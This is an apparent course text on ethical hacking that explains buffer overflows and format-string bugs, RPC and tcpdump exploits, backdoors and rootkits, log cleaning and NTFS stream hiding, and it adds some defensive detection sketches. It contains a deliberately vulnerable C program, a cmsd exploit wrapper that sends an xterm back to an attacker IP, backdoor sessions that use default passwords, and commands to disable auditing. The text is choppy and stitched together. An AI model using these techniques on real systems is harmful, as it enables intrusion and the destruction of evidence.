forwards all the data received on its inbound connection to the remote destination port
beyond the firewall and returns the reply traffic back to the initiating system. This makes
setting up multiple netcat sessions look positively painful. Fpipe performs the same task
transparently.
The term buffer refers to a data area shared by program processes that operate with
different sets of priorities. In other words, a buffer is a contiguous area in the system's
memory space that holds multiple instances of the same data type. The buffer allows
each process to operate without being held up by the other. In order for a buffer to be
effective, the size of the buffer and the way data is moved into and out of the buffer
need to be considered.
In the above code, the buffer variable is declared with a length of 5 characters;
however, the main function allows the program to read an input that can be 10
characters long. The 'buf' (buffer) variable can only store a maximum of 5 characters.
The question, then, is where do the excess characters end up on the system?
If "buf" is a global variable, the excess data will probably be allocated in a data
segment elsewhere in memory, where the excess characters may overwrite an
unrelated portion of data (though this is only a possibility). In most cases, however,
'buf' is likely to be a local variable, allocated on the stack. So instead of overwriting
data, the program ends up overwriting the stack itself.
In programming terms, a stack is an abstract data type. Stacks consist of objects stored
in last-in, first-out (LIFO) order: the last object placed on the stack is the first object to
be removed from it.
A malicious user of the program will try to craft input such that the program overwrites
the rest of the data stored on the stack. Remember that there was code initially on the
stack. Once this is done, the attacker will try to input some machine code that
overwrites the part of the stack that held code. It is possible for the attacker to
arrange for the execution of his code the next time the system calls the affected
function. If so, the program will execute the malicious code instead of the code that
normally would have been executed. It is a home run for the attacker. Note that the
attacker does not need to transfer very much data, but just enough to run something
that will allow him to connect to the target machine.
The media would like everyone to believe that some sort of magic is involved with
compromising the security of a UNIX system. In reality, four primary methods are used
to remotely circumvent the security of a UNIX system:
Format strings are very useful when used properly. They provide a way of formatting
text output by taking in a dynamic number of arguments, each of which should properly
match up to a formatting directive in the string. The printf family of functions
accomplishes this by scanning the format string for "%" characters. When this character
is found, an argument is retrieved via the stdarg function family. The characters that
follow are assessed as directives, controlling how the variable will be formatted as a
text string.
An example is the %i directive to format an integer variable to a readable decimal value.
In this case, printf("%i", val) prints the decimal representation of val on the screen for
the user. Security problems arise when the number of directives does not match the
number of supplied arguments. It is important to note that each supplied argument that
will be formatted is stored on the stack. If more directives than supplied arguments are
present, then all subsequent data stored on the stack will be used as the supplied
arguments. Therefore, a mismatch in directives and supplied arguments will lead to
erroneous output.
Another problem occurs when a lazy programmer uses a user-supplied string as the
format string itself, instead of using more appropriate string output functions. An
example of this poor programming practice is printing the string stored in a variable buf.
For example, you could simply use puts(buf) to output the string to the screen or, if you
wish, printf("%s", buf). A problem arises when the programmer does not follow the
guidelines for the formatted output functions. Although subsequent arguments are
optional in printf(), the first argument must always be the format string. If a user-supplied
argument is used as this format string, as in printf(buf), it may pose a serious
security risk to the offending program. A user could easily read out data stored in the
process memory space by passing format directives such as %x to display each
successive WORD on the stack.
Reading process memory space can be a problem in itself. However, it is much more
devastating if an attacker has the ability to directly write to memory. Luckily for the
attacker, the printf() functions provide them with the %n directive. printf() does not
format and output the corresponding argument, but rather takes the argument to be the
memory address of an integer and stores the number of characters written so far to that
___location. The last key to the format string vulnerability is the ability of the attacker to
position data onto the stack to be processed by the attacker's format string directives.
This is readily accomplished via printf and the way it handles the processing of the
format string itself. Data is conveniently placed onto the stack before being processed.
Therefore, eventually, if enough extra directives are provided in the format string, the
format string itself will be used as subsequent arguments for its own directives.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
    char buf[2048] = { 0 };
    if (argc < 2)      /* guard against a missing argument */
        return 1;
    strncpy(buf, argv[1], sizeof(buf) - 1);
    printf(buf);       /* VULNERABLE: user input used as the format string */
    putchar('\n');
    return 0;
}
RPC services register with the portmapper when started. To contact an RPC service,
you must query the portmapper to determine on which port the required RPC service is
listening. Unfortunately, numerous stock versions of UNIX have many RPC services
enabled upon boot up. To exacerbate matters, many of the RPC services are extremely
complex and run with root privileges. Therefore, a successful buffer overflow or input
validation attack will lead to direct root access. Much of the rage in remote RPC buffer
overflow attacks relates to the services rpc.ttdbserverd and rpc.cmsd, which are part of the
common desktop environment (CDE). Because these two services run with root
privileges, attackers need only to successfully exploit the buffer overflow condition and
send back an xterm or a reverse telnet, and the game is over. Other dangerous RPC
services include rpc.statd and mountd, which are active when NFS is enabled. Even if
the portmapper is blocked, the attacker may be able to manually scan for the RPC
services (via the -sR option of nmap), which typically run at a high-numbered port. The
sadmind vulnerability has gained popularity with the advent of the sadmind/IIS worm.
Many systems are still vulnerable to sadmind years after it was found vulnerable! The
aforementioned services are only a few examples of problematic RPC services. Due to
RPC's distributed nature and complexity, it is ripe for abuse, as shown next:
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection
reset
by peer
A simple shell script that calls the cmsd exploit simplifies this attack and is shown next.
It is necessary to know the system name; in our example, the system is named "itchy."
We provide the target IP address of "itchy," which is 192.168.1.11. We provide the
system type (2), which equates to Solaris 2.6. This is critical because the exploit is
tailored to each operating system. Finally, we provide the IP address of the attacker's
system (192.168.1.103) and send back the xterm.
#!/bin/sh
if [ $# -lt 4 ]; then
echo "Rpc.cmsd buffer overflow for Solaris 2.5 & 2.6 7"
echo "If rpcinfo -p target_ip |grep 100068 = true - you win!"
echo "Don't forget to xhost+ the target system"
echo ""
echo "Usage: $0 target_hostname target_ip </ version (1-7)> your_ip"
exit 1
fi
echo "Executing exploit..."
cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2
As you can see from this example, it is easy to exploit this overflow and gain root
access to the vulnerable system. It took little work for us to demonstrate this
vulnerability, so you can imagine how easy it is for the bad guys to set their sights on all
those vulnerable RPC services!
This is done because of the shortcomings in both the DNS protocol and vendor
implementations. This includes improper implementations of the transaction ID space
size and randomness, fixed source port for outgoing queries, and multiple identical
queries for the same resource record causing multiple outstanding queries for the
resource record.
As with any other DNS attack, the first step is to enumerate vulnerable servers. Most
attackers will set up automated tools to quickly identify unpatched and misconfigured
DNS servers.
To determine whether your DNS has this potential vulnerability, you perform the
following enumeration technique:
This will query named and determine the associated version. Again, this underscores
how important it is to accurately footprint your environment. In our example, the target
DNS server is running named version 9.4.2, which is vulnerable to the attack.
First, tcpdump must be running with the -s (snaplen) option, used to specify the number
of bytes in each packet to capture. For our example, we will use 500, which is enough to
re-create the buffer overflow condition in the AFS parsing routine:
It is important to mention that tcpdump run without a specified snaplen will default to 68
bytes, which is not enough to exploit this particular vulnerability. Now we will launch the
actual attack. We specify our target (192.168.1.200) running the vulnerable version of
tcpdump. This particular exploit is hard coded to send back an xterm, so we supply the
IP address of the attacking system, 192.168.1.50. Finally, we must supply a memory
offset for the buffer overflow condition (which may be different on other systems) of 100:
We are greeted with an xterm that has root privileges. Obviously, if this were a system
used to perform network management, or one that had an IDS that used tcpdump, the
effects would be devastating. What makes this problem worse is the fact that both the RPC
decoding and the TCP stream reassembly engine, named stream4, are enabled by
default. The Snort project had source patches and fixed binaries available for download
within hours of the vulnerability advisories being released; however, an exploit was
publicly available for the TCP stream reassembly vulnerability shortly after the advisory
was released.
21. Trojans
Once attackers have obtained root, they can "Trojanize" just about any command on
the system. That's why it is critical that you check the size and date/timestamp on all
your binaries, but especially on your most frequently used programs, such as login, su,
telnet, ftp, passwd, netstat, ifconfig, ls, ps, ssh, find, du, df, sync, reboot, halt, shutdown,
and so on.
For example, a common Trojan in many rootkits is a hacked-up version of login. The
program will log in a user just as the normal login command does; however, it will also
log the input username and password to a file. A hacked-up version of ssh will perform
the same function as well.
Another Trojan may create a back door into your system by running a TCP listener that
waits for clients to connect and provide the correct password. Rathole, written by
Icognito, is a UNIX back door for Linux and OpenBSD. The package includes a makefile
and is easy to build. Compilation of the package produces two binaries: the client, rat,
and the server, hole. Rathole also includes support for Blowfish encryption and process-
name hiding. When a client connects to the back door, the client is prompted for a
password. After the correct password is provided, a new shell and two pipe files are
created. The I/O of the shell is duplicated to the pipes, and the daemon encrypts the
communication. Options can be customized in hole.c and should be changed before
compilation. Following is a list of the options that are available and their default values:
For the purposes of this demonstration, we will keep the default values. The rathole
server (hole) will bind to port 1337, use the password "rathole!" for client validation,
and run under the fake process name "bash". After authentication, the user will be
dropped into a Bourne shell, and the files /tmp/.pipe0 and /tmp/.pipe1 will be used for
encrypting the traffic. Let's begin by examining running processes before and after the
server is started.
[schism]# ./hole
root@schism:~/rathole-1.2# ps aux |grep bash
root 4072 0.0 0.3 4176 1812 tty1 S+ 14:41 0:00 –bash
root 4088 0.0 0.3 4168 1840 pts/0 Rs 14:42 0:0 –bash
root 4192 0.0 0.0 720 52 ? Ss 15:11 0:00 bash
[apogee]$ ./rat
Usage: rat <ip> <port>
[apogee]$ ./rat 192.168.1.103 1337
Password:
#
The number of potential Trojan techniques is limited only by the attacker's imagination
(which tends to be expansive). For example, back doors can use reverse shell, port
knocking, and covert channel techniques to maintain a remote connection to the
compromised host. Vigilant monitoring and inventorying of all your listening ports will
prevent this type of attack, but your best countermeasure is to prevent binary
modification in the first place.
Attackers are always looking for new ways to access information. They make it a point
to know the perimeter and the people on it (security guards, receptionists, and help
desk workers) in order to exploit human oversight. People have been conditioned not
to be overly suspicious; they associate certain behavior and appearance with known
entities. For instance, on seeing a man dressed in brown and stacking a whole bunch of
boxes in a cart, people will hold the door open because they think it is the delivery man.
Some companies list employees by title and give their phone number and email address
on the corporate Web site. Alternatively, a corporation may put advertisements in the
paper for high-tech workers trained on Oracle databases or UNIX servers. These
little bits of information help attackers know what kind of system they're tackling. This
overlaps with the reconnaissance phase.
Summary:
Thus the Unit provides in-depth coverage of the pre-attack phases and the techniques
used to gain and maintain access on a target network, along with the skill level of the
perpetrator and the initial level of access. In covering the pre-attack phases, the
scanning methodology is treated in depth, with the different types of scanning
techniques covered in both Windows and Linux environments. This is one of the
important phases in Ethical Hacking, in which the attacker gains in-depth knowledge
about the targets. After explaining the scanning techniques, the Unit takes the learner to
the next level of Ethical Hacking, in which the procedure for interpreting scan results is
discussed in detail, so that the learner can have a deep understanding of the different
types of services running on the target. The Unit then focuses on the procedure to gain
access on the target using different kinds of attacks, including privilege escalation and
password cracking on the target system. It also provides the learner in-depth knowledge
of DNS attacks and various other attacks that can be committed in promiscuous mode
within a network. Conclusively, it covers Social Engineering and Trojan attacks.
Reference:
Banner Grabbing and Scanning: http://www.youtube.com/watch?v=dPQRO3mIohw
1. What is Ping?
3. What are the step by step procedures to detect the Operating System in a target?
4. What is a Telnet?
Objective:
The Objective of this Unit is to explain how access gained through hacking is
maintained, and the techniques a malicious hacker uses to remove the traces of attacks
in order to escape legal punishment.
Introduction:
The Unit primarily covers the techniques used to maintain the access gained in the previous phases of an attack, thereby allowing the attacker to return to the target network again and again. The Unit also focuses on the techniques commonly used to cover up evidence in order to evade forensic investigation and escape legal punishment.
1. Maintaining access
Once a hacker gains access to the target, the attacker can choose either to use the system and its resources, further using the system as a launch pad to scan and exploit other systems, or to keep a low profile and continue exploiting the system quietly. Both of these actions have damaging consequences for the organization. For instance, the attacker can install a sniffer to capture all network traffic, including Telnet and FTP sessions to other systems.
Attackers choosing to remain undetected remove evidence of their entry and use a backdoor or a Trojan to gain repeat access. They can also install rootkits at the kernel level to gain superuser control. The reason is that rootkits gain access at the operating system level, while Trojan horses gain access at the application level and depend, to a certain extent, on users to get installed. On Windows systems, most Trojans install themselves as a service and run as Local System, which has higher privileges than the Administrator account.
Hackers can use Trojan horses to transfer user names, passwords, and even credit card information stored on the system. They can maintain control over 'their' system for long periods by 'hardening' the system against other hackers, and in the process sometimes render some degree of protection to the system from other attacks. They can then use their access to steal data, consume CPU cycles, trade sensitive information, or even resort to extortion.
Although the term was originally coined on the UNIX platform ("root" being the superuser account there), the world of Windows rootkits has undergone a renaissance period in the last few years. Interest in Windows rootkits was originally driven primarily by Greg Hoglund, who produced one of the first utilities officially described as an "NT rootkit" circa 1999 (although many others had been "rooting" and pilfering Windows systems long before then using custom tools and assemblies of public programs, of course). Hoglund's original NT Rootkit was essentially a proof-of-concept platform for illustrating the concept of altering protected system programs in memory ("patching the kernel" in geek-speak) to completely eradicate the trustworthiness of the operating system.
Microsoft and many other operating system vendors use only two of the four privilege levels (called rings) provided by standard Intel hardware. This sets up a single barrier between nonprivileged user-mode activity in Ring 3 and highly privileged kernel-mode functions in Ring 0 (again, Rings 1 and 2 are not used). Thus, any mechanism that can penetrate the veil between user mode and kernel mode can attain unlimited access to the system.
Jamie's presentation goes on to describe a more direct mechanism for attaining control of kernel memory: kernel-mode device drivers (or loadable kernel modules, LKMs, on non-Windows systems). This is how most modern rootkits work today.
Thus, rootkits are composed of two basic pieces: a dropper and a payload. The dropper is anything that can get the target system to execute code, be it a security vulnerability or tricking a user into opening an e-mail attachment. The payload is typically a kernel-hooking routine or a kernel-mode device driver that performs one or more of the following techniques to hide its presence and perform its nefarious activities:
This is traditionally done either by usurping kernel access calls or, more recently, by loading a malicious device driver (.sys), which is itself then hidden. Once the kernel is compromised, standard API calls that could be used to identify hidden files, ports, processes, and so on can be usurped to give false information. Good luck trying to find a rootkit when you can't even trust the dir or netstat commands! The subsequent techniques mostly rely on this important first step.
Because processes are necessary to do work on Windows, a good rootkit must find a way to hide them. Most commonly, rootkits hide a process by delinking it from the active process list, which prevents common APIs from seeing it. Many rootkits also create threads, which are subcomponents of a process. By creating threads "hidden" within processes, it becomes more difficult for users to identify running programs.
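Cross-view detection tools turn this hiding technique against itself: two independently gathered lists of process IDs are compared, and anything present in the low-level view but missing from the API-based view is suspect. The following is a minimal illustrative sketch in Python, assuming a Linux host where the /proc filesystem and the ps command provide the two views; it is a teaching aid, not a production detector.

```python
import os
import subprocess

def cross_view_diff(api_view, raw_view):
    """Return PIDs present in the raw view but missing from the API view.

    A rootkit that delinks a process from the active process list fools
    API-based tools, but may still leave traces in other views, so a
    discrepancy between two independently gathered PID sets is a
    classic hidden-process indicator.
    """
    return set(raw_view) - set(api_view)

def linux_pid_views():
    """Gather two independent PID views on Linux: ps output vs /proc."""
    ps_out = subprocess.run(["ps", "-e", "-o", "pid="],
                            capture_output=True, text=True).stdout
    api_view = {int(line) for line in ps_out.split()}
    raw_view = {int(name) for name in os.listdir("/proc") if name.isdigit()}
    return api_view, raw_view

if __name__ == "__main__":
    api_view, raw_view = linux_pid_views()
    # Short-lived processes can race between the two snapshots, so a
    # real detector would re-sample before flagging anything.
    print("PIDs in /proc but not in ps:", sorted(cross_view_diff(api_view, raw_view)))
```

On Windows, the same idea applies with different views (for example, a raw kernel-object walk versus the Tool Help API), which is considerably more involved.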
To hide the backdoor component that allows remote control via a network, rootkits commonly attempt to hide the network ports on which they listen, whether TCP or UDP. The popular rootkit "kit" Hacker Defender hooks every process on the system and thus can avoid easy identification using investigative techniques such as netstat. Hacker Defender uses a 256-bit key to authenticate commands to these ports. Other rootkits, including cd00r and SAdoor, adopt techniques such as port knocking (http://www.portknocking.org) to achieve a similar capability.
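The idea behind port knocking can be illustrated with a short sketch: a monitor watches connection attempts to closed ports and activates the real backdoor only after a secret sequence arrives in order and on time. Everything here (the sequence, the timing window, the event format) is a hypothetical illustration, not the actual cd00r or SAdoor implementation.

```python
# Hypothetical secret knock: connection attempts must hit these closed
# ports in this exact order, each within WINDOW seconds of the last.
SECRET_SEQUENCE = [7000, 8000, 9000]
WINDOW = 5.0

def check_knock(events, sequence=SECRET_SEQUENCE, window=WINDOW):
    """events is a list of (timestamp, port) tuples, as a packet filter
    might record them. Returns True if the secret sequence appears in
    order with no more than `window` seconds between consecutive knocks."""
    idx = 0          # position within the secret sequence
    last_ts = None   # timestamp of the last correct knock
    for ts, port in events:
        if last_ts is not None and ts - last_ts > window:
            idx = 0          # too slow: restart the sequence
            last_ts = None
        if port == sequence[idx]:
            idx += 1
            last_ts = ts
            if idx == len(sequence):
                return True  # full sequence seen: open the real port
        # In this simple sketch, stray ports between knocks are ignored;
        # stricter implementations reset the sequence on any wrong port.
    return False
```

Because the knock ports are closed, a port scanner sees nothing listening, which is exactly why the text notes that such backdoors evade casual identification.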
The primary technique utilized by Hacker Defender is to use the Windows API functions WriteProcessMemory and CreateRemoteThread to create a new thread within all running processes. The function of this thread is to alter the Windows API library kernel32.dll by patching it in memory, rewriting the information returned by API calls to hide hxdef's presence. hxdef also installs hidden backdoors, registers as a hidden system service, and installs a hidden system driver, probably to provide redundant reinfection vectors if one or more are discovered.
hxdef's popularity probably relates to its ease of use combined with powerful functionality (ironically similar to its host system, Windows). Its INI file is easy to understand, and it binds to every listening port to listen for incoming commands, as we noted earlier in our discussion of port hiding. You have to use the hxdef backdoor client to connect to the backdoored port, as shown next:
Host: localhost
Port: 80
Pass: hxdef-rules
connecting server ...
receiving banner ...
opening backdoor ..
backdoor found
checking backdoor ......
backdoor ready
authorization sent, waiting for reply
authorization – SUCCESSFUL
backdoor activated!
C:\WINNT\system32>
Note that we've used the default password to connect to the backdoor thread on port 80, which is commonly used to host a web server (and thus passes through standard firewall configurations).
Like hxdef, FU consists of two components: a user-mode dropper (fu.exe) and a kernel-mode driver (msdirectx.sys). The dropper is a console application that allows certain parameters of the rootkit to be modified by the attacker. The driver performs the standard unlinking of the attacker-defined process from the standard process list to hide it from users. Again, once it is installed in the kernel, it's curtains for the victim system.
Vanquish is a DLL-injection-based Romanian rootkit that hides files, folders, and Registry entries and logs passwords. It is composed of the files vanquish.exe and vanquish.dll. DLL injection first gained notoriety circa NT4 with the getadmin exploit. DLL injection is similar to hooking kernel-mode API calls, except that it injects malicious code into a privileged process to achieve the same ends. Microsoft has sought to limit its exposure to DLL injection, for example by causing the operating system to shut down when the integrity of privileged processes is violated by DLL injection attempts.
The AFX Rootkit attempts to simplify rootkit deployment. AFX is composed of two files, iexplore.dll and explorer.dll, which it renames iexplore.exe and explorer.exe and copies to the system folder. Anything executed from its root folder will be hidden in several dynamic ways. Shifting the techniques used to hide components makes AFX more difficult to detect by tools that look for only one or two hiding techniques. AFX is also interesting for its easy-to-use graphical user interface for generating customized rootkits.
Although we prefer the term "drone" or "agent," bot is derived from "robot" and has traditionally referred to a program that performs predefined actions in an automated fashion on unmonitored Internet Relay Chat (IRC) channels. The connection with IRC is important, because the primary mechanism for controlling most malicious bots today is IRC. Zombie simply refers to a machine that has been infected with a bot.
What would anyone want to do with an army of PCs hooked up to the Internet? To leverage the potentially massive power of thousands of computers harnessed together, of course. Typically, abuse falls into the following categories:
Spam: Ongoing efforts have closed down most of the unsecured e-mail relays on the Internet today, but this seems not to have dented the massive volume of spam flowing into inboxes worldwide. Ever wonder why? Spammers are buying access to zombies that run e-mail gateways. Even better, this sort of distributed spamming is more difficult to block by mail servers that key on high volumes of mail from a single source; with zombies, you dribble out a low volume of mail from thousands of sources.
5. Disabling Auditing
If the target system's owner is halfway security savvy, they will have enabled auditing, as we explained earlier in this chapter. Because auditing can slow down performance on active servers, especially if the success of functions such as User & Group Management is audited, most Windows admins either don't enable auditing or enable only a few checks. Nevertheless, the first thing intruders will check on gaining Administrator privilege is the status of the Audit policy on the target, in the rare instance that activities performed while pilfering the system are being watched. The Resource Kit's auditpol tool makes this a snap. The next example shows auditpol run with the disable argument to turn off auditing on a remote system (output abbreviated):
C:\> auditpol /disable
Running ...
Local audit information changed successfully ...
New local audit policy ...
(0) Audit Disabled
AuditCategorySystem = No
AuditCategoryLogon = Failure
AuditCategoryObjectAccess = No
At the end of their stay, the intruders will simply turn auditing back on using the auditpol /enable switch, and no one will be the wiser. Individual audit settings are preserved by auditpol.
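A defender can watch for exactly this disable-and-reenable trick by periodically capturing audit policy output and flagging fully disabled categories. The sketch below simply parses the "AuditCategoryX = value" lines in the format shown above; a real monitor would invoke auditpol itself and compare the results over time.

```python
def audit_policy_alerts(auditpol_output):
    """Parse category lines of auditpol-style output (the
    'AuditCategoryX = value' format shown above) and return the names
    of categories whose auditing is fully off ('No')."""
    alerts = []
    for line in auditpol_output.splitlines():
        if "=" not in line:
            continue  # skip banner lines such as '(0) Audit Disabled'
        name, _, value = line.partition("=")
        name, value = name.strip(), value.strip()
        if name.startswith("AuditCategory") and value == "No":
            alerts.append(name)
    return alerts

# Sample text taken from the abbreviated auditpol output above.
sample = """\
(0) Audit Disabled
AuditCategorySystem = No
AuditCategoryLogon = Failure
AuditCategoryObjectAccess = No
"""
print(audit_policy_alerts(sample))
```

Diffing these alerts between scheduled runs would reveal the window during which auditing was silently switched off.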
Some of the features logclean-ng supports include (use the -h and -H options for the complete list):
wtmp, utmp, lastlog, samba, syslog, accounting, prelude, and snort support
Generic text file modification
Interactive mode
Program logging and encryption capabilities
Manual file editing
Complete log wiping for all files
Timestamp modification
Of course, the first step in removing the record of their activity is to alter the login logs. Discovering the appropriate technique requires a peek into the /etc/syslog.conf configuration file. For example, from the syslog.conf file shown next, we know that the majority of the system logins can be found in the /var/log directory.
With this knowledge, the attackers know to look in the /var/log directory for key log files. With a simple listing of that directory, we find all kinds of log files, including cron, maillog, messages, spooler, auth, wtmp, and xferlog.
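The same peek at syslog.conf can be automated. The sketch below is a simplified parser, assuming the classic "selector action" line format; it ignores remote (@host) and other non-file destinations and returns only plain file paths, which is enough to reproduce the /var/log discovery described above.

```python
def log_destinations(conf_text):
    """Extract local log file paths from syslog.conf-style text.
    Each non-comment line is 'selector <whitespace> action'; actions
    beginning with / are plain files (a leading '-' means unsynced)."""
    paths = set()
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                       # skip blanks and comments
        parts = line.split()
        if len(parts) >= 2:
            action = parts[-1].lstrip("-")  # drop the no-sync marker
            if action.startswith("/"):
                paths.add(action)
    return sorted(paths)

# A hypothetical syslog.conf fragment for illustration.
sample = """\
# Log all the mail messages in one place.
mail.*            -/var/log/maillog
authpriv.*         /var/log/secure
*.info;mail.none   /var/log/messages
*.emerg            *
"""
print(log_destinations(sample))
```

The same parse serves both sides: the intruder learns which files to scrub, and the auditor learns which files to protect and forward off-host.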
A number of files will need to be altered, including messages, secure, wtmp, and xferlog. Because the wtmp log is in binary format (and typically used only for the who command), the attackers will often use a rootkit program to alter this file. Wzap is specific to the wtmp log and will clear out the specified user from the wtmp log only. For example, after running such a cleaner, the new output log (wtmp.out) has the user "w00t" removed. Files such as the secure, messages, and xferlog log files can all be updated using the log cleaner's find and remove (or replace) capabilities.
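Because binary logs such as wtmp can be rewritten in place, defenders often keep an out-of-band integrity baseline against which the current files are compared. The following sketch shows the local mechanics using SHA-256 hashes; since logs also grow legitimately, a real deployment would ship copies to a remote loghost and perform the comparison there.

```python
import hashlib
import os

def hash_file(path):
    """SHA-256 of a file's contents, read in chunks to bound memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def changed_files(baseline, paths):
    """Compare current hashes against a previously recorded baseline
    dict {path: hexdigest}; return the paths whose contents differ."""
    return [p for p in paths
            if os.path.exists(p) and baseline.get(p) != hash_file(p)]
```

Any edit by a cleaner like Wzap changes the digest, so even a byte-for-byte-plausible wtmp rewrite is visible against the baseline.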
One of the last steps will be to remove their own commands. Many UNIX shells keep a history of the commands run, to provide easy retrieval and repetition. For example, the Bourne Again shell (/bin/bash) keeps a file in the user's home directory (including root's, in many cases) called .bash_history that maintains a list of the recently used commands. Usually, as the last step before signing off, attackers will want to remove their entries from this file. Using a simple text editor, the attackers will remove these entries and use the touch command to reset the last-accessed date and time on the file. Often, attackers will not generate history files at all, because they disable the history feature of the shell, for example by unsetting the HISTFILE variable or setting HISTSIZE to 0. Additionally, an intruder may link .bash_history to /dev/null.
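These history tricks leave their own telltales that a defender can check for. The sketch below flags the two classic indicators described above: a .bash_history symlinked to /dev/null, or one that is present but suspiciously empty. The function name and return strings are illustrative, not from any standard tool.

```python
import os

def history_tampered(path):
    """Flag classic shell-history tampering indicators for a given
    .bash_history path. Returns a short reason string, or None if
    nothing suspicious is found."""
    if os.path.islink(path):
        target = os.readlink(path)
        if target == "/dev/null":
            return "symlinked to /dev/null"
        return "unexpected symlink to " + target
    if os.path.exists(path) and os.path.getsize(path) == 0:
        return "history file is empty"
    return None
```

An empty or redirected history is not proof of intrusion (users disable history too), so this check is best treated as one indicator among several.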
The approaches illustrated above will aid in covering a hacker's tracks, provided two conditions are met.
Now that we have compiled the log cleaner and created our list, let's run the program. The program will attach to the process ID of syslogd and stop any entries from being logged when they match any value in our list.
If we grep through the auth logs on the system, we will see that no entry has been created for this recent connection. The same holds true if syslog forwarding is enabled.
We should note that the debug option was enabled at compile time to allow you to see the entries as they are intercepted and discarded; however, a hacker would want the log cleaner to be as stealthy as possible and would not output any information to the console or anywhere else. The malicious user would also use a kernel-level rootkit to hide all files and processes relating to the log cleaner. We will discuss kernel rootkits in detail in the next section.
8. Hiding Files
Keeping a toolkit on the target system for later use is a great timesaver for malicious hackers. However, these little utility collections can also be calling cards that alert wary system admins to the presence of an intruder. Therefore, steps will be taken to hide the various files necessary to launch the next attack.
attrib: Hiding files gets no simpler than copying files to a directory and using the old DOS attrib tool to hide them, as shown with the following syntax:
attrib +h [directory]
This hides files and directories from command-line tools, but not if the Show All Files option is selected in Windows Explorer.
To stream files, an attacker will need the POSIX utility cp from the Resource Kit. The syntax is simple, using a colon in the destination file to specify the stream. For example, nc.exe can be hidden in the nc.exe stream of oso001.009, and unstreamed again by running cp in the other direction. The modification date on oso001.009 changes, but not its size. (Some versions of cp may not alter the file date.) Therefore, hidden streamed files are very hard to detect. Deleting a streamed file involves copying the "front" file to a FAT partition and then copying it back to NTFS. Streamed files can still be executed while hiding behind their front. Due to cmd.exe limitations, streamed files cannot be executed directly (that is, as oso001.009:nc.exe). Instead, try using the start command to execute the file:
start oso001.009:nc.exe
An attacker would like to remove evidence of his presence and activities for various reasons, including maintaining access and evading criminal punishment. This is normally done by removing any evidence from the log files and replacing system binaries, such as netstat, with Trojans so that the system administrator cannot detect the intruder on the attacked system. Once the Trojans are in place, the attacker can be assumed to have gained total control of the system. Just as there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. By executing the script, a variety of critical files are replaced, hiding the attacker in seconds.
Steganography and Tunneling: Other techniques include steganography and tunneling. Steganography is the process of hiding data, for instance inside image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Even the extra space in the TCP and IP headers can be used for hiding information. An attacker can use the system as a cover to launch fresh attacks against other systems, or use it as a means to reach another system on the network undetected. Thus, this phase of attack can turn into a new cycle of attack using reconnaissance techniques all over again. There have been instances where attackers have lurked on systems even as system administrators changed. The system administrator can deploy host-based IDS and antivirus tools that can detect Trojans and other seemingly benign files and directories.
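The least-significant-bit (LSB) technique is the classic way to hide data in image files: each cover byte (say, a grayscale pixel) gives up its lowest bit to carry one bit of the secret, changing the pixel's intensity by at most one step. The sketch below operates on raw pixel bytes and assumes the receiver knows the message length; real steganography tools add headers, encryption, and bit-spreading on top of this idea.

```python
def embed_lsb(pixels, message):
    """Hide message bytes in the least significant bits of a sequence
    of 8-bit cover values (e.g., a grayscale image's raw bytes). Each
    cover byte carries one bit, so capacity is len(pixels) // 8 bytes."""
    bits = [(byte >> (7 - i)) & 1 for byte in message for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover too small for message")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit   # overwrite only the lowest bit
    return bytes(out)

def extract_lsb(pixels, length):
    """Recover `length` bytes previously embedded with embed_lsb."""
    out = bytearray()
    for i in range(length):
        byte = 0
        for bit_index in range(8):
            byte = (byte << 1) | (pixels[i * 8 + bit_index] & 1)
        out.append(byte)
    return bytes(out)
```

Embedding six bytes into a 1,024-byte cover alters at most 48 values by one intensity step each, which is visually imperceptible; this is why steganographic hiding is so hard to spot without statistical analysis.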
As an ethical hacker, you must be aware of the tools and techniques deployed by attackers so that you are able to advocate and take countermeasures to ensure protection. These will be learned in this course.
Summary:
The Unit covered the maintenance phase of hacking and the techniques and tools used by hackers to maintain access. The Unit clearly explained the way backdoors are created by the attacker to maintain access. It focused on the concept of keystroke capture and how it can impact organizational IT assets. The Unit gave detailed coverage of the function of the bots and zombies used by attackers to damage IT infrastructure. Conclusively, the Unit also explained the methodology attackers use to cover all their tracks in networks and escape legal action.
Reference:
Maintaining the Access through Metasploit: http://www.youtube.com/watch?v=TmkW6JyoRns
Glossary:
2. What is a rootkit?